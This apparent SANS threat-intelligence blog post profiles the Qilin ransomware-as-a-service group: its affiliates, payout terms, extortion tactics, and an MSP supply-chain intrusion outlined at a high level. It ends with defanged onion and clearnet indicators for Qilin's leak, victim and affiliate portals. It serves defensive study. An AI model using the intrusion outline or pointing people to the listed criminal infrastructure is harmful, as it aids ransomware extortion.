Talk With an Expert

The Evolution of Qilin RaaS

Qilin represents one of the most dangerous and adaptive RaaS threats active today.

Authored byWill Thomas
Will Thomas

The authors of FOR589 discuss the evolution of one of the most active cybercriminal threats known as Qilin, a ransomware-as-a-service (RaaS) operation originating from the Russian-speaking underground community.

In this blog, we will discuss the evolution of Qilin, a well-known RaaS platform that has been linked to several high-profile ransomware attacks, including against Synnovis, The Big Issue, Yanfen, and Inotiv.

  • Qilin RaaS has emerged as one of the leading platforms following the takedown of LockBit, the exit scam by ALPHV/BlackCat, and the shutdown of RansomHub.
  • The ransomware is used for “big game hunting” style attacks, which involve encrypting enterprise networks and demanding ransoms in the millions of dollars.
  • Defenders and investigators can expect to see more Qilin victims appear in the short-term. However, as this group gains notoriety, it attracts the attention of more law enforcement agencies who have successfully shut down multiple RaaS groups in recent years.

Summary of the Qilin RaaS Up to Mid-2025

Active since at least mid-2022, the Qilin group is named after the mythical Chinese creature The cybercriminals behind the Qilin RaaS, however, speak Russian. Before the Qilin RaaS emerged, the threat actors used the name Agenda ransomware, later changing to Qilin.

Qilin ransomware is used for domain-wide encryption, and a ransom is then demanded for the decryption keys and/or to prevent the publication of the stolen data. Qilin affiliates are recruited from cybercrime forums to use the Qilin RaaS platform, which handles payload generation, the publication of stolen data, and ransom negotiations.

Qilin is advertised on the exclusive Russian-speaking forum RAMP (short for Ransom Anon Market Place [sic]), where acquiring an account can cost up to $500 in BTC. The forum profile “Haise” joined RAMP on May 29 2022, and advertised Qilin on February 13, 2023.

On May 1, 2024, Qilin made an unusual move by adding a new QR code to its Tor data leak site, which pointed to a site called WikiLeaksV2, hosted on the Clearnet site (see on URLscan here), where they listed a selection of their victims in addition to soliciting cryptocurrency donations. They also claimed in a pseudo-interview with themselves to be politically motivated.

RansomwareLive is a useful source for investigating ransomware groups. One of the most valuable sources of data is the negotiation chats between ransomware gangs and their victims. The website contains a detailed negotiation chat between a Qilin negotiator and a victim, providing insight into how the group operates.

To entice victims to pay the ransom, the Qilin negotiator offered several services, including a decryption tool, a list of stolen files, proof that the data was deleted, an explanation of how they infiltrated the victim’s network, security recommendations, and a promise not to attack the victim again. Qilin also allowed victims to decrypt up to three files as proof they had decryption capability.

This negotiation chat began on February 3, 2025, and concluded on February 26, 2025, with no ransom being paid. During the chat, Qilin mentioned having stolen patient data, and on February 26, a medical company in Canada matching this description was listed on Qilin’s data leak site.

Qilin RaaS Affiliate System

In short, a ransomware affiliate is essentially a partner in a RaaS operation. These are external cybercriminals (individuals or groups) who “rent” or are invited to access the RaaS through an affiliate program. Affiliates keep a cut of ransom payments, while the operators take a smaller percentage in exchange for providing the ransomware payloads, Tor infrastructure, and negotiation portal.

In March 2023, Group-IB researchers noted that Qilin affiliates using the RaaS received up to 80% if the ransom paid was $3 million USD or less. For ransoms over $3 million USD, an affiliate's cut could rise to 85%. In July 2023, KELA spotted that the Qilin RaaS operator Haise stated on RAMP that ransom payments are paid to their affiliates’ cryptocurrency wallets first and only then is a share transferred to the Qilin RaaS operators.

As of July 2025, however, security researcher Arda Büyükkaya (@WhichbufferArda) identified multiple forum posts criticising the Qilin RaaS. One affiliate, “hastalamuerte,” claimed they lost $48,000 USD (in Bitcoin) after a ransom negotiation “mysteriously disappeared” from a Tox chat. In the same thread, another actor, “Nova,” posted credentials and a screenshot of Qilin’s affiliate panel to embarrass the group. It appears that not all affiliates of Qilin are satisfied, and some are even attempting to sabotage it.

Notable Affiliates of Qilin RaaS

In June 2022, Microsoft reported that DEV-0237 (also known as FIN12) was identified as an affiliate of Agenda ransomware, the precursor to Qilin. FIN12 was also an affiliate of Nokoyawa, ALPHV/BlackCat, Hive, Conti, and Ryuk ransomware according to Microsoft.

On April 30, 2023, Qilin published Siix Corporation to its Tor data leak site. On October 17, 2023, ALPHV/BlackCat also published Siix Corporation to its Tor site. On October 26, 2023, SG World appeared on the Qilin Tor data leak site, having previously been listed on the Conti Tor data leak site on April 17, 2021.

In July 2024, Microsoft shared that Octo Tempest (also known as SCATTERED SPIDER) had become a Qilin affiliate, known for using social engineering techniques such as vishing IT helpdesk personnel to reset passwords and for targeting VMware ESXi servers with ransomware.

In March 2025, Microsoft identified Moonstone Sleet, a North Korean state actor, deploying Qilin ransomware at a limited number of organizations.

In April 2025, a Qilin affiliate self-identified as “Devman” when they included “Pwn3d By Qilin & Devman” in one of their victim posts. The affiliate also revealed the ransom demand of $60,000 USD and included an onion link to “DEVMANS_BLOG,” a different Tor data leak site.

The Qilin Network

In March 2025, a new extortion group appeared called Arkana Security. Arkana launched a new data leak site and claimed to have stolen over 2 million customer records from WideOpenWest (WOW!), a major US internet service provider. Later, on Arkana’s Tor data leak site, the “About & Contact” page displayed a Qilin Network logo, suggesting an affiliation between the two groups.

Qilin’s Legal Department

In June 2025, Qilin’s administrator, Haise, posted to RAMP announcing plans to add a “call lawyer” legal assistance feature to the RaaS panel. This pseudo-legal service was framed as legal advice to help affiliates manage extortion negotiations and increase pressure on victims, reflecting the maturing of the RaaS ecosystem.

By performing legal assessments to classify stolen data, the extortionists aimed to emphasize compliance risks and regulatory exposure under frameworks such as GDPR, CCPA, and HIPAA as well as applicable laws by jurisdiction.

Qilin’s goal is to push victims to pay by convincing them that lawsuits and reputational damage would be costlier than the ransom.

Fake Europol Poster for Qilin Admins

In July 2025, a Telegram channel called “@EuropolRewards” appeared, claiming to be Europol. It offered rewards of up to $50,000 for information leading to the arrest of Qilin administrators “Haise” and “XORacle.” Europol later confirmed to SecurityWeek that this Telegram channel was a scam and not affiliated with the law enforcement agency.

It remains unclear who was behind this campaign. One theory is that Qilin itself launched it to find out what investigators already knew about their identities so that they can improve their operational security (OPSEC). Another is that rival cybercriminals wanted to expose Qilin admins, potentially to hand the information to law enforcement in the hopes that they are arrested or sanctioned.

Qilin Supply Chain Attack

In late January 2025, Qilin affiliates (tracked by Sophos as STAC4365) launched a cleverly crafted phishing email campaign posing as authentication alerts for a Managed Service Provider’s ScreenConnect RMM tool.

Victims who clicked the link were redirected to a malicious phishing site that intercepted both login credentials and MFA one-time passwords (OTPs), granting the attackers super-admin access to the MSP's environment.

Once inside, the attackers:

  • Deployed their own ScreenConnect instances across multiple customer networks.
  • Used PsExec and WinRM for reconnaissance and lateral movement.
  • Exploited CVE-2023-27532 in Veeam Cloud Backup.
  • Disabled backups, exfiltrated data, and deployed Qilin ransomware.

Outlook

Qilin RaaS is unusual and interesting for several reasons. Its affiliates range from state-sponsored North Korean threat actors to members of SCATTERED SPIDER, as well as Devman and Arkana. Healthcare remains a key target, consistent with FIN12’s past focus on hospitals.

Qilin has been absorbing affiliates from disrupted groups like LockBit and ALPHV/BlackCat. And there are signs that its infrastructure is unable to keep up with the volume of attacks conducted by its users. Its administrators are also innovating by expanding through the Qilin Network and introducing legal intimidation tactics via the “call lawyer” feature.

As a result, Qilin represents one of the most dangerous and adaptive RaaS threats active today.

Recommended Best Practices

  • Maintain and test backups.
  • Ensure data loss prevention (DLP) systems are configured properly.
  • Develop and rehearse incident response plans through tabletop exercises (TTXs).
  • Prepare for scenarios where threat actors attempt to highlight the legal implications of breaches.

Additional Resources

Qilin Infrastructure

Qilin Data Leak Site:

  • ozsxj4hwxub7gio347ac7tyqqozvfioty37skqilzo2oqfs4cw2mgtyd[.]onion
  • kbsqoivihgdmwczmxkbovk7ss2dcynitwhhfu5yw725dboqo5kthfaad[.]onion
  • Ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd[.]onion

Qilin Victim Portal:

  • ozsxj4hwxub7gio347ac7tyqqozvfioty37skqilzo2oqfs4cw2mgtyd[.]onion

Qilin Affiliate Portal:

  • ji57fr53anp7wb44tbbnp72qcgbhqywy4jmbncawdcrejj5amuvh3zqd[.]onion

Qilin Clearnet Site:

  • wikileaksv2[.]com (31.41.244[.]100)

How SANS FOR589: Cybercrime Investigations Can Help

Mitigating ransomware attacks requires regular reviews of detection systems and system resiliency. Cybercriminals like Qilin affiliates will continue to rely on similar tactics, techniques, and procedures (TTPs).

In the SANS FOR589 class, students learn to:

  • Access and monitor cybercriminal forums where initial access brokers and RaaS platforms are active.
  • Track emerging threats, document TTPs, and build a dossier on cybercriminals.
  • Identify opportunities for interdiction.

Sign up for a FOR589 sample on SANS.org or register for FOR589: Cybercrime Investigations now to develop actionable intelligence skills to defend against the most notorious cybercriminals.